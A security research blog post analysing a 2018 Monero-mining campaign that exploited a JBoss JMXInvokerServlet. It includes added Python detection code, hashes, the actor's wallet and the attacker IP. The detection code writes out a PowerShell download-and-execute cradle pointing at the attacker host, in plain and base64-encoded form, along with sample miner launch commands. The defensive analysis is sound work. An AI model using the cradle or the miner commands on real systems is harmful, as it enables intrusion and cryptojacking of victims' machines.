
NINE BOOMS MONERO MINER

On the afternoon of Friday, February 23rd, 2018, the Emagined Security Research team reviewed an alert passed through our Security Operations team involving a hit on a JBoss JMXInvokerServlet endpoint.

(image: JMXInvokerServlet request)

Based on the traffic patterns and user agent strings, the team believes the actor is using JexBoss, an open source JBoss exploitation tool, to automate this exploit.


Within the attack code was an obvious PowerShell downloader pointing to 200[.]7[.]97[.]205 on port 8086. The IP address is reportedly located in the Netherlands.
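The detection side of the two steps above, as an added example that is not part of the original post: a small Python triage script that parses web-server access-log lines and flags hits on the JBoss invoker and console endpoints JexBoss probes (keeping the user agent so repeated hits from one source can be correlated), and that pulls download-cradle URLs out of PowerShell command lines, decoding -EncodedCommand first, and emits them defanged the way the post does. The log lines and command lines are constructed for the example, and the /win.txt path on the attacker host is an assumption; the JBoss paths are the real endpoint names.

```python
"""Added example: triage helpers for the JBoss -> PowerShell cradle chain above."""
import base64
import re
from collections import Counter
from urllib.parse import urlsplit

# Real JBoss endpoint paths that JexBoss probes; a POST to the invoker servlets is
# the exploitation step (the servlet deserialises the request body).
JBOSS_PATHS = (
    "/invoker/JMXInvokerServlet",
    "/invoker/EJBInvokerServlet",
    "/jmx-console/",
    "/web-console/",
    "/admin-console/",
)

# NCSA combined log format: src ident user [ts] "METHOD path proto" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Constructed sample log lines (not real traffic).
SAMPLE_ACCESS_LOG = """\
203.0.113.10 - - [23/Feb/2018:14:02:11 -0800] "POST /invoker/JMXInvokerServlet HTTP/1.1" 200 1407 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.10 - - [23/Feb/2018:14:02:12 -0800] "POST /invoker/JMXInvokerServlet HTTP/1.1" 200 1407 "-" "Mozilla/5.0 (X11; Linux x86_64)"
198.51.100.7 - - [23/Feb/2018:14:03:40 -0800] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 10.0)"
203.0.113.10 - - [23/Feb/2018:14:04:01 -0800] "HEAD /jmx-console/ HTTP/1.1" 401 0 "-" "Mozilla/5.0 (X11; Linux x86_64)"
"""


def parse_access_log(text):
    """Parse combined-format lines into dicts; lines that do not match are skipped."""
    return [m.groupdict() for m in map(LOG_RE.match, text.splitlines()) if m]


def find_jboss_probes(records):
    """Keep records that touch a JBoss endpoint and label them exploit vs recon."""
    hits = []
    for rec in records:
        path = rec["path"].split("?", 1)[0]
        if any(path.startswith(p) for p in JBOSS_PATHS):
            exploit = rec["method"] == "POST" and path.startswith("/invoker/")
            hits.append({**rec, "stage": "exploit" if exploit else "recon"})
    return hits


def count_by_source(hits):
    """(source IP, user agent) -> hit count; one tool usually keeps one UA per run."""
    return Counter((h["src"], h["ua"]) for h in hits)


# PowerShell download-cradle verbs and the -EncodedCommand flag (with its prefixes).
CRADLE_VERB_RE = re.compile(
    r"DownloadString|DownloadFile|DownloadData|Invoke-WebRequest|Invoke-RestMethod"
    r"|Start-BitsTransfer|\biwr\b|\birm\b",
    re.IGNORECASE,
)
URL_RE = re.compile(r"https?://[^\s'\"()<>]+", re.IGNORECASE)
ENC_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand (base64 of UTF-16LE) argument, or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def defang(host):
    return host.replace(".", "[.]")


def extract_cradles(cmdline):
    """Return download URLs from a PowerShell command line, looking inside -EncodedCommand."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else cmdline + " " + decoded
    if not CRADLE_VERB_RE.search(text):
        return []
    found = []
    for url in URL_RE.findall(text):
        parts = urlsplit(url)
        port = parts.port or (443 if parts.scheme.lower() == "https" else 80)
        found.append({"url": url, "host": parts.hostname, "port": port,
                      "defanged": f"{defang(parts.hostname)}:{port}"})
    return found


CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://200.7.97.205:8086/win.txt')"
# Constructed command lines as a process-creation event would record them; the
# /win.txt path on the attacker host is an assumption, not taken from the post.
SAMPLE_CMDLINES = [
    'cmd.exe /c powershell -nop -w hidden -c "' + CRADLE + '"',
    "powershell.exe -nop -w hidden -enc "
    + base64.b64encode(CRADLE.encode("utf-16-le")).decode("ascii"),
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1",
]

if __name__ == "__main__":
    hits = find_jboss_probes(parse_access_log(SAMPLE_ACCESS_LOG))
    for (src, ua), n in count_by_source(hits).items():
        print(f"{n} JBoss hits from {defang(src)} with UA {ua!r}")
    for cmd in SAMPLE_CMDLINES:
        for c in extract_cradles(cmd):
            print("cradle ->", c["defanged"], c["url"])
```

The access-log part is deliberately path-based rather than user-agent-based: JexBoss user agents vary, but the invoker and console paths do not, and a POST to /invoker/JMXInvokerServlet from an external address is rarely legitimate. The cradle part decodes -EncodedCommand before matching because the plain and encoded forms of the same downloader otherwise look nothing alike in process telemetry.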


(image: PowerShell downloader using port 8086)

The team immediately captured the text file (win.txt), which was itself a PowerShell script that downloaded a second-stage binary.


(image: second-stage binary download)

The files noted, 32Kilences.exe and 64Kilences.exe, are two builds of the same executable, one for 32-bit Windows and one for 64-bit. Kilences is Hungarian for "nine."


The team also found a "lin.txt" on the same host, which serves two files for Linux hosts:


(image: lin.txt contents)

BoomBoom is a 64-bit statically linked ELF binary, while BoomBoom2 is the 32-bit version.


The team set out to take the binary apart, which the attackers made very easy; the file utility identifies it as a self-extracting archive:


32Kilences.exe: PE32 executable (GUI) Intel 80386, for MS Windows, RAR self-extracting archive


Extracting the RAR self-extracting executable yields two new files:

  • MD5 (run.bat) = ac229848385ba895cffd5523602b7162

  • MD5 (systemgo.exe) = 646cb81ec7e8aaa93a7580491edeb56e

systemgo.exe is a popular Monero miner, and run.bat gives us all of the important details:


(image: run.bat contents)

The actor's Monero wallet, 45cToD1FzkjAxHRBhYKKLg5utMGENqyamWrY8nLNkVQ4hJgLHex1KNRZcz4finRjMpAYmPxDaXVpN2rV1jMNyXRdMEaH1YA, is clearly visible in the batch file and can be looked up on MineXMR.com:


(image: wallet lookup on MineXMR.com)
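A way to pull the durable identifiers out of a miner launcher like run.bat, as an added example that is not the post's own code: it recognises Monero addresses by format (standard, subaddress, integrated), reads the pool and wallet from xmrig-style -o/-u/-p or --url=/--user=/--pass= arguments, and returns the pool host and port for blocking or for pivoting to the pool's public stats, as the team did on MineXMR.com. The batch-file contents, the flag syntax and the pool endpoint are assumed for the example; the wallet address is the one from the post. The address check is a format check only and does not verify the base58 checksum.

```python
"""Added example: pull the Monero wallet and pool out of a miner launcher batch file."""
import re
from urllib.parse import urlsplit

# Monero base58 alphabet (no 0, O, I, l). Standard addresses are 95 chars starting
# with 4, subaddresses 95 chars starting with 8, integrated addresses 106 chars
# starting with 4. Format check only; the base58 checksum is not verified here.
B58 = r"[1-9A-HJ-NP-Za-km-z]"
MONERO_ADDR_RE = re.compile(rf"\b(?:4{B58}{{105}}|[48]{B58}{{94}})\b")

# The wallet address from the post.
WALLET = "45cToD1FzkjAxHRBhYKKLg5utMGENqyamWrY8nLNkVQ4hJgLHex1KNRZcz4finRjMpAYmPxDaXVpN2rV1jMNyXRdMEaH1YA"

# Constructed batch files. The post does not reproduce run.bat; these use xmrig-style
# flags (-o/--url pool, -u/--user wallet, -p/--pass password) and the pool endpoint
# is assumed. The second shows the --flag=value spelling and a worker-name suffix.
SAMPLE_RUN_BAT = f"""\
@echo off
systemgo.exe -o stratum+tcp://pool.minexmr.com:4444 -u {WALLET} -p x -k
"""
SAMPLE_RUN_BAT_GNU = f"""\
@echo off
systemgo.exe --url=pool.minexmr.com:4444 --user={WALLET}.rig1 --pass=x --keepalive
"""

FLAG_ALIASES = {
    "-o": "pool", "--url": "pool",
    "-u": "wallet", "--user": "wallet",
    "-p": "password", "--pass": "password",
}


def parse_miner_args(batch_text):
    """Return pool/wallet/password from the first line that carries a Monero address."""
    for line in batch_text.splitlines():
        if not MONERO_ADDR_RE.search(line):
            continue
        found = {"command": line.strip()}
        tokens = line.split()
        for i, tok in enumerate(tokens):
            flag, _, value = tok.partition("=")
            if flag in FLAG_ALIASES:
                if not value and i + 1 < len(tokens):
                    value = tokens[i + 1]  # "-o URL" form: value is the next token
                found[FLAG_ALIASES[flag]] = value
        return found
    return None


def classify_address(addr):
    if len(addr) == 106:
        return "integrated"
    return "subaddress" if addr.startswith("8") else "standard"


def pool_endpoint(pool):
    """Split 'stratum+tcp://host:port' or bare 'host:port' into (host, port)."""
    if "://" not in pool:
        pool = "//" + pool  # so urlsplit treats it as a netloc, not a scheme
    parts = urlsplit(pool)
    return parts.hostname, parts.port


def miner_iocs(batch_text):
    """Extract what a defender wants: wallet (with type and worker), pool host/port."""
    args = parse_miner_args(batch_text)
    if not args or "wallet" not in args:
        return None
    m = MONERO_ADDR_RE.search(args["wallet"])
    if not m:
        return None
    addr = m.group(0)
    host, port = pool_endpoint(args["pool"]) if args.get("pool") else (None, None)
    return {
        "wallet": addr,
        "wallet_type": classify_address(addr),
        "worker": args["wallet"][m.end():].lstrip(".") or None,
        "pool_host": host,
        "pool_port": port,
        "password": args.get("password"),
        "command": args["command"],
    }


if __name__ == "__main__":
    for sample in (SAMPLE_RUN_BAT, SAMPLE_RUN_BAT_GNU):
        print(miner_iocs(sample))
```

The wallet is the identifier worth keeping: hosts and ports change between campaigns, but the payout address is what the actor cannot rotate without losing accumulated hashrate, so it is the value to search pool stats and threat-intel feeds for.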

With the actor having earned somewhere around 11 XMR, the value of Monero at the time of writing puts that at around $3,228 USD.


(image: XMR to USD conversion)

Evidence that even unskilled attackers can use open source technology to make a few dollars.

This campaign has been logged with AlienVault's OTX.


The original win.txt and lin.txt are available here.

Observables:

  • 32Kilences.exe: MD5 5f980357049bec59acf4fa3f64ad076f, SHA1 33a714dd10caf6f7e1ecfd7290de02ac0ef565ac

  • 64Kilences.exe: MD5 41f120f918d226275471e00f1fd7bd2f, SHA1 4d17be57e35eecf5a7ba6fa54084179527594635

  • win.txt: MD5 e7f9375443cd29f771875c185062c6ba, SHA1 7966aba65e7f64a746ecb34eac14f515156a8145

  • lin.txt: MD5 0d3784ddb430cdeb2f0641a68b7715e4, SHA1 bf095c444bcae7aae21a4a823e7f83b42a626547

  • BoomBoom: MD5 f75a3ee5fba082e6ccc38373cff39176, SHA1 2652eea0140a0b0de3a642b9a0263a7f67ce83ac

  • BoomBoom2: MD5 2e49d437c95119becb881a3a269832d6, SHA1 957109bd145306ff38f703d8cd0955f1114c3a85

  • run.bat (extracted from 32Kilences.exe): MD5 ac229848385ba895cffd5523602b7162

  • systemgo.exe (extracted from 32Kilences.exe): MD5 646cb81ec7e8aaa93a7580491edeb56e

  • Network: IP 200.7.97.205, port 8086
